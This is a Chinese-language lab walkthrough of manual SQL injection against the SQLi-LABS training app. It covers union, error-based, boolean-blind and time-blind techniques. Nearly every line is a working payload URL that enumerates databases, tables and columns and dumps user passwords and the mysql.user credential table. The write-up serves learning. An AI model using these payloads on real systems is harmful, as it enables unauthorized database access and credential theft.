通过手工注入获取数据,加深对各种注入类型漏洞的理解

1.联合查询

环境 SQLi-LABS/Less-1

1.1检测注入

http://192.168.1.10:9999/Less-1?id=1'
http://192.168.1.10:9999/Less-1?id=1'--+
#加单引号后报错,再加上 --+ 注释掉后面的语句则不报错
http://192.168.1.10:9999/Less-1?id=1' and 1=1 --+
http://192.168.1.10:9999/Less-1?id=1' and 1=2 --+
#1=1 时返回用户数据,1=2 时不返回数据

1.2检测当前查询语句的字段数

http://192.168.1.10:9999/Less-1?id=1' and 1=1 order by 3 --+
http://192.168.1.10:9999/Less-1?id=1' and 1=1 order by 4 --+
#order by 3 正常,order by 4报错,说明有3个字段

1.3检测显示位置

http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,3 --+
#联合查询中前一个查询的条件为false不返回行,因此页面显示后一个查询的数据,2和3出现在网页上

1.4获取数据库的信息

数据库版本与当前数据库名称

http://192.168.1.10:9999/Less-1/?id=1'  and 1=2 union select 1,version(),database() --+

mysql server一共有多少个库

http://192.168.1.10:9999/Less-1/?id=1'  and 1=2  union SELECT 1,2,count(schema_name) from information_schema.schemata --+

获取数据库名称

#分别获取每一个库的名称
http://192.168.1.10:9999/Less-1/?id=1' and 1=2  union SELECT null,null,schema_name from information_schema.schemata limit 0,1--+

http://192.168.1.10:9999/Less-1/?id=1' and 1=2  union SELECT null,null,schema_name from information_schema.schemata limit 1,1--+

http://192.168.1.10:9999/Less-1/?id=1' and 1=2  union SELECT null,null,schema_name from information_schema.schemata limit 2,1--+

http://192.168.1.10:9999/Less-1/?id=1' and 1=2  union SELECT null,null,schema_name from information_schema.schemata limit 3,1--+

http://192.168.1.10:9999/Less-1/?id=1' and 1=2  union SELECT null,null,schema_name from information_schema.schemata limit 4,1--+

#一次查询出所有库的名称
http://192.168.1.10:9999/Less-1/?id=1'  and 1=2  union SELECT 1,2,group_concat(schema_name) from information_schema.schemata --+

1.5获取表的信息

#当前数据库一共有多少个表
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,count(table_name) from information_schema.tables where table_schema = database() --+

#分别获取当前库每个表的名称
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema = database() limit 0,1 --+

http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema = database() limit 1,1 --+

http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema = database() limit 2,1 --+

http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema = database() limit 3,1 --+

#一次获取当前库所有表名
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema = database() --+

##将 database() 换成其他库名即可获取其他库的表信息

1.6获取列信息

#获取当前库 users表有多少列
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, count(column_name) from information_schema.columns where table_schema = database() and table_name ='users'--+

#分别获取每一列的名称
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, column_name from information_schema.columns where table_schema = database() and table_name ='users' limit 0,1--+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, column_name from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1--+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, column_name from information_schema.columns where table_schema = database() and table_name ='users' limit 2,1--+
#一次获取所有列的名称
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema = database() and table_name ='users'--+

1.7获取表数据

获取一共有多少条数据

http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, count(concat_ws('---',id,username,password)) from security.users  --+

分别获取每一条数据

http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 0,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 1,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 2,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 3,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 4,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 5,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 6,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 7,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 8,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 9,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 10,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 11,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 12,1 --+

一次获取所有数据

http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, group_concat( concat_ws('---',id,username,password)) from security.users --+

1.8获取mysql-user信息

#一共有多少个用户
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, count(concat_ws('---',host,user,Password)) from `mysql`.user --+
#分别获取每一个用户
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,concat_ws('---',host,user,Password) from `mysql`.user limit 0,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,concat_ws('---',host,user,Password) from `mysql`.user limit 1,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,concat_ws('---',host,user,Password) from `mysql`.user limit 2,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,concat_ws('---',host,user,Password) from `mysql`.user limit 3,1 --+
#一次获取所有用户
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,group_concat(concat_ws('---',host,user,Password)) from `mysql`.user limit 0,1 --+

2.报错注入

报错注入常见的10个函数及用法,将 payload 替换为对应的 sql 子查询即可获取相应信息。这类方法依赖页面回显数据库的报错信息,页面不回显报错时无法使用。

#floor()
 (select 1 from (select count(*),concat(payload,floor(rand(0)*2))x from information_schema.tables group by x)a) 

#multilinestring()
multilinestring((select * from(select * from(select payload)a)b))

#extractvalue()
(extractvalue(1,concat(0x7e,(select payload),0x7e)))

#linestring()
linestring((select * from(select * from(select payload))a)b))

#updatexml()
 (updatexml(1,concat(0x7e,(select payload),0x7e),1))

#exp()
exp(~(select * from(select payload)a))

#geometrycollection()
geometrycollection((select * from(select * from(select payload)a)b))

#multipoint()
multipoint((select * from(select * from(select payload)a)b))

#polygon()
polygon((select * from(select * from(select payload)a)b))

#multipolygon()
 multipolygon((select * from(select * from(select payload)a)b))

环境 SQLi-LABS/Less-5

2.1检测注入

http://192.168.1.10:9999/Less-5/?id=1'
http://192.168.1.10:9999/Less-5/?id=1' and 1=1--+
http://192.168.1.10:9999/Less-5/?id=1' and 1=2--+
单引号报错(页面回显数据库报错信息),1=1 有返回,1=2 没有返回,前端不显示查询的数据,因此可使用报错注入

2.2获取数据库的信息

#获取数据库版本
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select version())," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

#获取当前数据库名称
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select database())," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

#mysql server一共有多少个数据库
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select count(schema_name) from information_schema.schemata)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+
#获取每一个数据库的名称
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 1,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 2,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 3,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 4,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

2.3获取表的信息

  1. 获取当前库表的总数
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select count(table_name) from information_schema.tables where table_schema = 'security')," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+
  1. 获取当前库的所有表名
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 0,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 1,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 2,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 3,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

2.4获取列信息

  1. 获取列字段总数
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select count(column_name) FROM  information_schema.columns where table_schema = 'security' and TABLE_NAME ='emails')," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+
  1. 获取列每个字段名称
#获取第一个字段名称
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select column_name FROM  information_schema.columns where table_schema = 'security' and TABLE_NAME ='emails' limit 0,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

#获取第二个字段名称
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select column_name FROM  information_schema.columns where table_schema = 'security' and TABLE_NAME ='emails' limit 1,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

2.5获取表数据

  1. 获取表一共有多少条数据
http://192.168.1.10:9999/Less-1/?id=-1' union select 1,2,count(concat_ws('---',id,email_id)) from `security`.emails --+
  1. 获取每一条数据
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 0,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 1,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 2,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 3,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 4,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 5,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 6,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 7,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

2.6获取mysql user信息

  1. 获取总的用户数
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select count((concat_ws('---',host,user,Password))) from `mysql`.user)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+
  1. 获取每一个用户的信息
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',host,user,Password) from `mysql`.user limit 0,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',host,user,Password) from `mysql`.user limit 1,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',host,user,Password) from `mysql`.user limit 2,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',host,user,Password) from `mysql`.user limit 3,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

3.布尔盲注

环境 SQLi-LABS/Less-8

3.1检测注入

http://192.168.1.10:9999/Less-8/?id=1'  
http://192.168.1.10:9999/Less-8/?id=1' and 1=1--+
http://192.168.1.10:9999/Less-8/?id=1' and 1=2--+
#1=1 有返回信息,1=2 没有返回,前端不显示查询的数据,只能根据页面是否有返回来判断条件真假,存在布尔盲注

3.2猜数据库信息

猜当前数据库名有多长

http://192.168.1.10:9999/Less-8/?id=2' and (length(database())=8) --+

猜当前数据库名

依次猜每个字符的ascii码
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),1,1))) =115  --+
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),2,1))) =101  --+
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),3,1))) =99  --+
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),4,1))) =117  --+
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),5,1))) =114  --+
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),6,1))) =105  --+
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),7,1))) =116  --+
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),8,1))) =121  --+

3.3猜表的信息

猜当前库一共有多少个表

http://192.168.1.10:9999/Less-8/?id=1'  and (select count(table_name) from information_schema.tables where table_schema = 'security') =4 --+

猜每一个表的长度


http://192.168.1.10:9999/Less-8/?id=1' and (select length(table_name) from  information_schema.tables where table_schema = 'security' limit 0,1) =6 

http://192.168.1.10:9999/Less-8/?id=1' and (select length(table_name) from  information_schema.tables where table_schema = 'security' limit 1,1) =8 --+ 

http://192.168.1.10:9999/Less-8/?id=1' and (select length(table_name) from  information_schema.tables where table_schema = 'security' limit 2,1) =7 --+
http://192.168.1.10:9999/Less-8/?id=1' and (select length(table_name) from  information_schema.tables where table_schema = 'security' limit 3,1) =5 --+

猜表名

依次猜每个字符的ascii码
http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(table_name,1,1)) from  information_schema.tables where table_schema = 'security' limit 0,1) =101 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(table_name,2,1)) from  information_schema.tables where table_schema = 'security' limit 0,1) =109 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(table_name,3,1)) from  information_schema.tables where table_schema = 'security' limit 0,1) =97 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(table_name,4,1)) from  information_schema.tables where table_schema = 'security' limit 0,1) =105 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(table_name,5,1)) from  information_schema.tables where table_schema = 'security' limit 0,1) =108 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(table_name,6,1)) from  information_schema.tables where table_schema = 'security' limit 0,1) =115 --+
#以上6个ascii码对应的第一个表名为 emails

3.4猜列的信息

猜有几列

http://192.168.1.10:9999/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'emails' ) =2 --+

猜列名长度

#第一列名称的长度
http://192.168.1.10:9999/Less-8/?id=1' and (select length(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'emails' limit 0,1) =2 --+
#第二列名称的长度
http://192.168.1.10:9999/Less-8/?id=1' and (select length(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'emails' limit 1,1) =8 --+

猜列名

#第一列名称第一个字符的ascii码
http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(column_name,1,1)) from information_schema.columns where table_schema = 'security' and table_name = 'emails' limit 0,1) =105 --+
#第一列名称第二个字符的ascii码
http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(column_name,2,1)) from information_schema.columns where table_schema = 'security' and table_name = 'emails' limit 0,1) =100 --+

3.5猜数据

猜一共有几条数据

判断一共有多少条数据
http://192.168.1.10:9999/Less-8/?id=1' and ( select count(concat_ws('-',id,email_id)) from security.emails) = 8 --+

判断第一条数据的长度

http://192.168.1.10:9999/Less-8/?id=1' and ( select length(concat_ws('-',id,email_id)) from security.emails limit 0,1) =18 --+

猜数据的内容

判断第一条数据第一个字符的ascii码(以下依次猜每个字符)
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),1,1)) from security.emails limit 0,1) =49  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),2,1)) from security.emails limit 0,1) =45  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),3,1)) from security.emails limit 0,1) =68  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),4,1)) from security.emails limit 0,1) =117  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),5,1)) from security.emails limit 0,1) =109  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),6,1)) from security.emails limit 0,1) =98  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),7,1)) from security.emails limit 0,1) =64  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),8,1)) from security.emails limit 0,1) =100  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),9,1)) from security.emails limit 0,1) =104  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),10,1)) from security.emails limit 0,1) =97  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),11,1)) from security.emails limit 0,1) =107  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),12,1)) from security.emails limit 0,1) =107  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),13,1)) from security.emails limit 0,1) =97  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),14,1)) from security.emails limit 0,1) =110  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),15,1)) from security.emails limit 0,1) =46  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),16,1)) from security.emails limit 0,1) =99  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),17,1)) from security.emails limit 0,1) =111  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),18,1)) from security.emails limit 0,1) =109  --+

3.6猜mysql user信息

猜一共有多少个用户

http://192.168.1.10:9999/Less-8/?id=1' and (select count(concat_ws('---',host,user,Password)) from `mysql`.user) = 4 --+

猜获取的第一条用户数据的长度

http://192.168.1.10:9999/Less-8/?id=1' and (select length(concat_ws('-',host,user,Password)) from `mysql`.user limit 0,1) =15 --+

猜第一条用户数据每个字符的ascii码

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),1,1)) from `mysql`.user limit 0,1)=108 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),2,1)) from `mysql`.user limit 0,1)=111 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),3,1)) from `mysql`.user limit 0,1)=99 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),4,1)) from `mysql`.user limit 0,1)=97 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),5,1)) from `mysql`.user limit 0,1)=108 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),6,1)) from `mysql`.user limit 0,1)=104 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),7,1)) from `mysql`.user limit 0,1)=111 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),8,1)) from `mysql`.user limit 0,1)=115 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),9,1)) from `mysql`.user limit 0,1)=116 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),10,1)) from `mysql`.user limit 0,1)=45 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),11,1)) from `mysql`.user limit 0,1)=114 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),12,1)) from `mysql`.user limit 0,1)=111 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),13,1)) from `mysql`.user limit 0,1)=111 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),14,1)) from `mysql`.user limit 0,1)=116 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),15,1)) from `mysql`.user limit 0,1)=45 --+

4.时间盲注

环境 SQLi-LABS/Less-9

4.1检测注入

http://192.168.1.10:9999/Less-9/?id=1'
http://192.168.1.10:9999/Less-9/?id=1' --+
http://192.168.1.10:9999/Less-9/?id=1' and 1=1 --+
http://192.168.1.10:9999/Less-9/?id=1' and 1=2 --+
http://192.168.1.10:9999/Less-9/?id=1' and sleep(5)--+
#无论输入什么都返回相同的页面;加上 and sleep(5) 后页面延迟约5秒才返回,说明存在时间盲注

4.2猜数据库信息

  1. 猜当前数据库名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((length(database()))=8,sleep(5),1)--+
  1. 猜当前数据库名
猜第一个字符的ascii码(此处用 >110 判断范围,再逐步缩小)
http://192.168.1.10:9999/Less-9/?id=1' and if((ascii(mid(database(),1,1)))>110,sleep(5),1)--+

4.3猜表信息

猜当前数据库一共有多少个表

http://192.168.1.10:9999/Less-9/?id=1' and if((select count(table_name) from information_schema.tables where table_schema = database())=4,sleep(5),1)--+

猜表名的长度

第一个表名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((select length(table_name) from information_schema.tables where table_schema = database() limit 0,1)=6,sleep(5),1)--+
第二个表名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((select length(table_name) from information_schema.tables where table_schema = database() limit 1,1)=8,sleep(5),1)--+
第三个表名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((select length(table_name) from information_schema.tables where table_schema = database() limit 2,1)=7,sleep(5),1)--+
第四个表名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((select length(table_name) from information_schema.tables where table_schema = database() limit 3,1)=5,sleep(5),1)--+

猜表名

第四张表名
第一个字符ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((table_name),1,1)) from information_schema.tables where table_schema = database() limit 3,1)=117,sleep(5),1)--+
第二个字符ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((table_name),2,1)) from information_schema.tables where table_schema = database() limit 3,1)=115,sleep(5),1)--+
第三个字符ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((table_name),3,1)) from information_schema.tables where table_schema = database() limit 3,1)=101,sleep(5),1)--+
第四个字符ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((table_name),4,1)) from information_schema.tables where table_schema = database() limit 3,1)=114,sleep(5),1)--+
第五个字符ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((table_name),5,1)) from information_schema.tables where table_schema = database() limit 3,1)=115,sleep(5),1)--+

4.4猜列的信息

猜表的列数

http://192.168.1.10:9999/Less-9/?id=1' and if((select count(column_name) from information_schema.columns where table_schema = database() and table_name ='users')=3,sleep(5),1)--+

猜列名的长度

第一列名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((select length(column_name) from information_schema.columns where table_schema = database() and table_name ='users' limit 0,1)=2,sleep(5),1)--+
第二列名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((select length(column_name) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=8,sleep(5),1)--+
第三列名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((select length(column_name) from information_schema.columns where table_schema = database() and table_name ='users' limit 2,1)=8,sleep(5),1)--+

猜列名

第一列名称的ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),1,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 0,1)=105,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),2,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 0,1)=100,sleep(5),1)--+

第二列名称的ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),1,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=117,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),2,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=115,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),3,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=101,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),4,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=114,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),5,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=110,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),6,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=97,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),7,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=109,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),8,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=101,sleep(5),1)--+

4.5猜数据

猜一共有多少条数据

http://192.168.1.10:9999/Less-9/?id=1' and if(( select count(concat_ws('-',id,username,password)) from security.users)=13,sleep(5),1)--+

猜第一条数据的长度

http://192.168.1.10:9999/Less-9/?id=1' and if(( select length(concat_ws('-',id,username,password)) from security.users limit 0,1)=11,sleep(5),1)--+

猜内容

猜第一条数据的第一个字符的ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),1,1)) from security.users limit 0,1)=49,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),2,1)) from security.users limit 0,1)=45,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),3,1)) from security.users limit 0,1)=68,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),4,1)) from security.users limit 0,1)=117,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),5,1)) from security.users limit 0,1)=109,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),6,1)) from security.users limit 0,1)=98,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),7,1)) from security.users limit 0,1)=45,sleep(5),1)--+

